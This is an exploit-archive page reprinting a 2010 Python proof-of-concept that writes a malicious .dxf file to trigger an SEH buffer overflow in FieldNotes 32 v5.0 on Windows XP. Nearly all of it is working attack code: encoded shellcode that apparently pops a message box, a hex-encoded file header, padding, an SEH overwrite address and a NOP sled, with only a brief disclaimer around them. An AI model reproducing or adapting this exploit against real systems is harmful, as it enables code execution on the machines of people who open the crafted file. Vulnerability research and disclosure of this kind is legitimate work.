FieldNotes 32 v5.0 Buffer Overflow (SEH)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

FieldNotes 32 v5.0 Buffer Overflow (SEH)

来源：http://tecninja.net/blog 作者：TecR0c 发布时间：2010-06-28

#!/usr/bin/python

# Title:                FieldNotes 32 v5.0 (SEH) 0day
# Date:   25/06/2010
# Author:               TecR0c - http://tecninja.net/blog aka Rocco Calvi
# Found by:             TecR0c - http://twitter.com/TecR0c
# Advisory:  http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053
# Platform:             Windows XP sp3 En
# Greetz to:            Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

# This software is known to be used by Power Authorises

# Usage: Launch Application > Open > Navigate to Map > Double click > BOOM

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________ ________ / /___ _____     / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/ |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] FieldNotes SEH (.dxf) - by TecR0c"

msg = ( # TITLE=Corelan TEXT="TecR0c pwned you"
"\x89\xe0\xda\xd3\xd9\x70\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x4b\x69\x4a\x4b\x4f\x6b\x4b\x69\x50\x74"
"\x44\x64\x48\x74\x44\x71\x49\x42\x4e\x52\x51\x6a\x46\x51"
"\x49\x59\x43\x54\x4e\x6b\x42\x51\x50\x30\x4e\x6b\x51\x66"
"\x46\x6c\x4c\x4b\x43\x46\x45\x4c\x4c\x4b\x42\x66\x45\x58"
"\x4e\x6b\x43\x4e\x51\x30\x4e\x6b\x46\x56\x44\x78\x42\x6f"
"\x42\x38\x44\x35\x49\x63\x42\x79\x47\x71\x4e\x31\x49\x6f"
"\x48\x61\x45\x30\x4c\x4b\x50\x6c\x46\x44\x44\x64\x4c\x4b"
"\x47\x35\x45\x6c\x4e\x6b\x51\x44\x43\x35\x42\x58\x45\x51"
"\x48\x6a\x4e\x6b\x51\x5a\x47\x68\x4e\x6b\x42\x7a\x47\x50"
"\x47\x71\x48\x6b\x48\x63\x46\x57\x47\x39\x4e\x6b\x45\x64"
"\x4e\x6b\x43\x31\x48\x6e\x50\x31\x4b\x4f\x50\x31\x49\x50"
"\x4b\x4c\x4c\x6c\x4d\x54\x4f\x30\x43\x44\x46\x6a\x49\x51"
"\x48\x4f\x46\x6d\x46\x61\x48\x47\x4a\x49\x4a\x51\x49\x6f"
"\x4b\x4f\x4b\x4f\x45\x6b\x43\x4c\x46\x44\x46\x48\x42\x55"
"\x49\x4e\x4c\x4b\x42\x7a\x51\x34\x43\x31\x48\x6b\x50\x66"
"\x4e\x6b\x46\x6c\x50\x4b\x4e\x6b\x50\x5a\x47\x6c\x46\x61"
"\x4a\x4b\x4c\x4b\x43\x34\x4e\x6b\x45\x51\x4a\x48\x4b\x39"
"\x51\x54\x45\x74\x47\x6c\x43\x51\x4a\x63\x48\x32\x44\x48"
"\x44\x69\x4e\x34\x4e\x69\x4d\x35\x4c\x49\x48\x42\x45\x38"
"\x4c\x4e\x42\x6e\x44\x4e\x4a\x4c\x42\x72\x49\x78\x4f\x6c"
"\x49\x6f\x49\x6f\x4b\x4f\x4d\x59\x51\x55\x45\x54\x4f\x4b"
"\x43\x4e\x4e\x38\x4d\x32\x43\x43\x4b\x37\x45\x4c\x46\x44"
"\x42\x72\x48\x68\x4c\x4b\x4b\x4f\x4b\x4f\x4b\x4f\x4d\x59"
"\x42\x65\x43\x38\x50\x68\x42\x4c\x42\x4c\x51\x30\x49\x6f"
"\x43\x58\x46\x53\x47\x42\x46\x4e\x50\x64\x45\x38\x51\x65"
"\x44\x33\x51\x75\x50\x72\x4e\x68\x43\x6c\x51\x34\x45\x5a"
"\x4d\x59\x48\x66\x51\x46\x4b\x4f\x50\x55\x46\x64\x4e\x69"
"\x4b\x72\x42\x70\x4f\x4b\x49\x38\x4d\x72\x42\x6d\x4d\x6c"
"\x4c\x47\x45\x4c\x51\x34\x43\x62\x48\x68\x51\x4e\x49\x6f"
"\x49\x6f\x49\x6f\x51\x78\x42\x4c\x50\x61\x50\x6e\x51\x48"
"\x42\x48\x51\x53\x42\x4f\x50\x72\x43\x55\x50\x31\x4b\x6b"
"\x4b\x38\x51\x4c\x44\x64\x47\x77\x4e\x69\x4a\x43\x42\x48"
"\x46\x38\x47\x50\x45\x70\x45\x70\x50\x68\x47\x50\x50\x79"
"\x50\x6f\x51\x65\x50\x68\x43\x47\x42\x4e\x42\x45\x42\x44"
"\x45\x38\x50\x30\x43\x53\x47\x50\x42\x50\x43\x58\x46\x34"
"\x51\x75\x51\x73\x50\x52\x50\x31\x4b\x79\x4c\x48\x42\x6c"
"\x45\x74\x42\x30\x4f\x79\x4d\x31\x50\x31\x4a\x72\x51\x42"
"\x42\x73\x46\x31\x50\x52\x49\x6f\x4a\x70\x44\x71\x4f\x30"
"\x42\x70\x4b\x4f\x46\x35\x43\x38\x47\x7a\x41\x41"
)

structure = "\x59\x6F\x75\x20\x77\x69\x6C\x6C\x20\x64\x69\x65"
structure += '\n'
structure += "\x53\x45\x43\x54\x49\x4F\x4E"
structure += '\n'
structure += "\x20\x20\x20\x32"
structure += '\n'
structure += "\x48\x45\x41\x44\x45\x52"
structure += '\n'
structure += "\x20\x20\x20\x39"
structure += '\n'
structure += "\x24\x48\x41\x4E\x44\x4C\x49\x4E\x47"
structure += '\n'
structure += "\x20\x20\x20\x37\x30"
structure += '\n'
structure += "\x31"
structure += "\n"
structure += "\x20\x20\x20\x39"
structure += '\n'
structure += "\x48\x41\x4E\x44\x53\x45\x45\x44"
structure += '\n'
structure += "\x20\x20\x20\x35"
structure += '\n'
structure += "\x20\x20\x20\x20\x31\x38\x30\x30"
structure += '\n'
structure += "\x20\x20\x20\x39"
structure += '\n'
structure += "\x24\x45\x58\x54\x4D\x49\x4E"
structure += '\n'
structure += "\x20\x20\x20\x31\x30"
structure += '\n'

buff = "\x44" * 500
buff += "\x2d\xd9\x6e\x01" # 0x016ED92D [pmnote32.dll]
buff += "\x42" * 4
buff += "\x90" * 50
buff += msg
buff += "\x90" * 100

tecfile = open('TecR0c.dxf','w');
tecfile.write(structure + buff)
tecfile.close()

[